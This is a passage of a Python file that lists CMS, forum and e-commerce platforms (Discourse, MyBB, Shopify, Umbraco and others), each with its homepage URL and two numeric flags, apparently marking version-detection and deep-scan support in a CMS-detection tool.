    'url':'https://contao.org/en/',
    'vd':'0',
    'deeps':'0'
}
con5 = {
    'name':'Concrete5 CMS',
    'url':'https://www.concrete5.org/',
    'vd':'1',
    'deeps':'0'
}
arc = {
    'name':'Arc Forum',
    'url':'http://arclanguage.org/',
    'vd':'0',
    'deeps':'0'
}
bboard = {
    'name':'Burning Board',
    'url':'https://www.woltlab.com/',
    'vd':'1',
    'deeps':'0'
}
dscrs = {
    'name':'Discourse',
    'url':'https://www.discourse.org/',
    'vd':'1',
    'deeps':'0'
}
discuz = {
    'name':'Discuz!',
    'url':'http://www.discuz.net/',
    'vd':'1',
    'deeps':'0'
}
flarum = {
    'name':'Flarum',
    'url':'https://flarum.org/',
    'vd':'0',
    'deeps':'0'
}
fluxbb = {
    'name':'FluxBB',
    'url':'https://fluxbb.org/',
    'vd':'0',
    'deeps':'0'
}
ipb = {
    'name':'IP.Board community forum',
    'url':'https://www.invisioncommunity.com/',
    'vd':'0',
    'deeps':'0'
}
minibb = {
    'name':'miniBB',
    'url':'http://www.minibb.com/',
    'vd':'1',
    'deeps':'0'
}
mybb = {
    'name':'MyBB',
    'url':'https://mybb.com/',
    'vd':'1',
    'deeps':'0'
}
nodebb = {
    'name':'NodeBB',
    'url':'https://nodebb.org/',
    'vd':'1',
    'deeps':'0'
}
punbb = {
    'name':'PunBB',
    'url':'http://punbb.informer.com/',
    'vd':'1',
    'deeps':'0'
}
smf = {
    'name':'Simple Machines Forum',
    'url':'http://simplemachines.org/',
    'vd':'1',
    'deeps':'0'
}
vanilla = {
    'name':'Vanilla Forums',
    'url':'https://vanillaforums.com',
    'vd':'1',
    'deeps':'0'
}
uknva = {
    'name':'uKnowva',
    'url':'https://uknowva.com/',
    'vd':'1',
    'deeps':'0'
}
xf = {
    'name':'XenForo',
    'url':'https://xenforo.com/',
    'vd':'0',
    'deeps':'0'
}
xmb = {
    'name':'XMB',
    'url':'https://www.xmbforum.com/',
    'vd':'1',
    'deeps':'0'
}
yabb = {
    'name':'YaBB (Yet another Bulletin Board)',
    'url':'http://www.yabbforum.com/',
    'vd':'1',
    'deeps':'0'
}
aef = {
    'name':'Advanced Electron Forum',
    'url':'http://www.anelectron.com/',
    'vd':'1',
    'deeps':'0'
}
bhf = {
    'name':'Beehive Forum',
    'url':'https://www.beehiveforum.co.uk/',
    'vd':'1',
    'deeps':'0'
}
fudf = {
    'name':'FUDforum',
    'url':'http://fudforum.org/forum/',
    'vd':'1',
    'deeps':'0'
}
phorum = {
    'name':'Phorum',
    'url':'https://www.phorum.org/',
    'vd':'0',
    'deeps':'0'
}
yaf = {
    'name':'Yet Another Forum (YAF)',
    'url':'http://www.yetanotherforum.net',
    'vd':'1',
    'deeps':'0'
}
yazd = {
    'name':'Yazd',
    'url':'http://www.forumsoftware.ca/',
    'vd':'0',
    'deeps':'0'
}
ubbt = {
    'name':'UBB.threads',
    'url':'http://www.ubbcentral.com/',
    'vd':'1',
    'deeps':'0'
}
nnf = {
    'name':'NoNonsense Forum',
    'url':'http://camendesign.com/nononsense_forum',
    'vd':'0',
    'deeps':'0'
}
myupb = {
    'name':'myUPB',
    'url':'http://www.myupb.com',
    'vd':'1',
    'deeps':'0'
}
mvnf = {
    'name':'mvnForum',
    'url':'https://sourceforge.net/projects/mvnforum/',
    'vd':'1',
    'deeps':'0'
}
mwf = {
    'name':'mwForum',
    'url':'https://www.mwforum.org/',
    'vd':'0',
    'deeps':'0'
}
mcb = {
    'name':'MercuryBoard',
    'url':'http://www.mercuryboard.com/',
    'vd':'1',
    'deeps':'0'
}
aspf = {
    'name':'AspNetForum',
    'url':'https://www.jitbit.com/asp-net-forum/',
    'vd':'1',
    'deeps':'0'
}
jf = {
    'name':'JForum',
    'url':'http://www.jforum.net/',
    'vd':'1',
    'deeps':'0'
}
afsto = {
    'name':'Afosto',
    'url':'https://afosto.com/',
    'vd':'0',
    'deeps':'0'
}
abuy = {
    'name':'Afterbuy',
    'url':'https://www.afterbuy.de',
    'vd':'0',
    'deeps':'0'
}
arstta = {
    'name':'Arastta',
    'url':'https://arastta.org/',
    'vd':'0',
    'deeps':'0'
}
bigc = {
    'name':'BigCommerce',
    'url':'https://www.bigcommerce.com/',
    'vd':'0',
    'deeps':'0'
}
bigw = {
    'name':'Bigware',
    'url':'https://bigware.de',
    'vd':'0',
    'deeps':'0'
}
bizw = {
    'name':'Bizweb',
    'url':'https://www.sapo.vn',
    'vd':'0',
    'deeps':'0'
}
cexec = {
    'name':'Clientexec',
    'url':'https://www.clientexec.com/',
    'vd':'0',
    'deeps':'0'
}
cloudc = {
    'name':'CloudCart',
    'url':'https://cloudcart.com/',
    'vd':'0',
    'deeps':'0'
}
cmshop = {
    'name':'ColorMeShop',
    'url':'https://shop-pro.jp/',
    'vd':'0',
    'deeps':'0'
}

oracle_atg = {
    'name': 'Oracle ATG Web Commerce',
    'url': 'http://www.oracle.com/us/products/applications/atg/web-commerce/web-commerce-search-330138.html',
    'vd': '1',
    'deeps': '0'
}

mdle = {
    'name':'Moodle',
    'url':'https://moodle.com/',
    'vd':'0',
    'deeps':'0'
}

orkis = {
    'name':'ORKIS Ajaris Websuite',
    'url':'http://www.orkis.com/',
    'vd':'0',
    'deeps':'0'
}

cmdia = {
    'name':'Comandia',
    'url':'https://www.comandia.com/',
    'vd':'0',
    'deeps':'0'
}

coms = {
    'name':'Commerce Server',
    'url':'http://commerceserver.net',
    'vd':'1',
    'deeps':'0'
}

cosmos = {
    'name':'Cosmoshop',
    'url':'https://www.cosmoshop.de/',
    'vd':'0',
    'deeps':'0'
}

csc = {
    'name':'CS Cart',
    'url':'https://www.cs-cart.com/',
    'vd':'0',
    'deeps':'0'
}

cubec = {
    'name':'CubeCart',
    'url':'https://www.cubecart.com/',
    'vd':'0',
    'deeps':'0'
}

abda = {
    'name':'Al Mubda',
    'url':'http://www.almubda.net/',
    'vd':'1',
    'deeps':'0'
}

dweb = {
    'name':'Dynamicweb',
    'url':'https://www.dynamicweb.dk/',
    'vd':'1',
    'deeps':'0'
}

ecc = {
    'name':'EC-CUBE',
    'url':'https://www.ec-cube.net/',
    'vd':'0',
    'deeps':'0'
}

elcd = {
    'name':'Elcodi',
    'url':'http://elcodi.io/',
    'vd':'0',
    'deeps':'0'
}

epgs = {
    'name':'ePages',
    'url':'https://epages.com',
    'vd':'0',
    'deeps':'0'
}

ezpub = {
    'name':'eZ Publish',
    'url':'https://ez.no/',
    'vd':'0',
    'deeps':'0'
}

for3 = {
    'name':'Fortune3',
    'url':'https://www.fortune3.com/',
    'vd':'0',
    'deeps':'0'
}

presta = {
    'name':'PrestaShop',
    'url':'https://www.prestashop.com/',
    'vd':'0',
    'deeps':'0'
}

btree = {
    'name':'BigTree CMS',
    'url':'https://www.bigtreecms.org/',
    'vd':'0',
    'deeps':'0'
}

pmoc = {
    'name':'Proximis Omnichannel',
    'url':'https://www.proximis.com',
    'vd':'0',
    'deeps':'0'
}

qcart = {
    'name':'Quick.Cart',
    'url':'https://opensolution.org/shopping-cart-quick-cart.html',
    'vd':'1',
    'deeps':'0'
}

rbsc = {
    'name':'RBS Change',
    'url':'https://www.rbschange.fr/',
    'vd':'1',
    'deeps':'0'
}

sfcc = {
    'name':'Salesforce Commerce Cloud',
    'url':'https://demandware.com/',
    'vd':'0',
    'deeps':'0'
}

sazito = {
    'name':'Sazito',
    'url':'https://sazito.com/',
    'vd':'0',
    'deeps':'0'
}

shopatron = {
    'name':'Shopatron',
    'url':'https://www.shopatron.com',
    'vd':'0',
    'deeps':'0'
}

umbraco = {
    'name':'Umbraco',
    'url':'https://umbraco.com',
    'vd':'1',
    'deeps':'1'
}

shoper = {
    'name':'Shoper',
    'url':'https://www.shoper.pl',
    'vd':'0',
    'deeps':'0'
}

shopery = {
    'name':'Shopery',
    'url':'https://shopery.com/',
    'vd':'0',
    'deeps':'0'
}

shopfa = {
    'name':'ShopFA',
    'url':'https://shopfa.com/',
    'vd':'1',
    'deeps':'0'
}

shopify = {
    'name':'Shopify',
    'url':'https://www.shopify.com/',
    'vd':'0',
    'deeps':'0'
}

shoptet = {
    'name':'Shoptet',
    'url':'https://www.shoptet.cz/',
    'vd':'0',
    'deeps':'0'
}

smartstore = {
    'name':'Smartstore',
    'url':'https://www.smartstore.com',
    'vd':'0',
    'deeps':'0'
}

solusquare = {
    'name':'Solusquare Commerce Cloud',
    'url':'https://www.solusquare.com/',
    'vd':'0',
    'deeps':'0'
}

spree = {
    'name':'Spree',
    'url':'https://spreecommerce.org/',
    'vd':'0',
    'deeps':'0'
}

bitrix = {
    'name':'Bitrix',
    'url':'https://www.1c-bitrix.ru',
    'vd':'0',
    'deeps':'0'
}

brightspot = {
    'name':'Brightspot CMS',
    'url':'https://www.brightspot.com/',
    'vd':'0',
    'deeps':'0'
}

amiro = {
    'name':'Amiro.CMS',
    'url':'https://www.amiro.ru',
    'vd':'1',
    'deeps':'0'
}

weebly = {
    'name':'Weebly',
    'url':'https://www.weebly.com/',
    'vd':'0',
    'deeps':'0'
}

ekmps = {
    'name':'ekmPowershop',
    'url':'https://www.ekm.com/',
    'vd':'0',
    'deeps':'0'
}

godaddywb = {
    'name':'GoDaddy Website Builder',
    'url':'https://godaddy.com/websites/website-builder',
    'vd':'1',
    'deeps':'0'
}

whmcs = {
    'name':'WHMCS',
    'url':'https://www.whmcs.com/',
    'vd':'0',
    'deeps':'0'
}

opennemas = {
    'name':'OpenNemas CMS',
    'url':'https://www.opennemas.com/',
    'vd':'0',
    'deeps':'0'
}

zencart = {
    'name':'Zen Cart CMS',
    'url':'https://www.zen-cart.com/',
    'vd':'0',
    'deeps':'0'
}

ipo = {
    'name':'IPO CMS',
    'url':'https://www.antee.cz/',
    'vd':'0',
    'deeps':'0'
}

hugo = {
    'name':'Hugo',
    'url':'https://gohugo.io/',
    'vd':'1',
    'deeps':'0'
}

squarespace = {
    'name':'Squarespace',
    'url':'https://www.squarespace.com/',
    'vd':'0',
    'deeps':'0'
}

notion = {
    'name':'Notion',
    'url':'https://notion.so',
    'vd':'0',
    'deeps':'0'
}

siquando = {
    'name':'SIQUANDO',
    'url':'https://www.siquando.de/',
    'vd':'0',
    'deeps':'0'
}

freshpage = {
    'name':'Freshpage',
    'url':'https://www.freshpage.ch/',
    'vd':'0',
    'deeps':'0'
}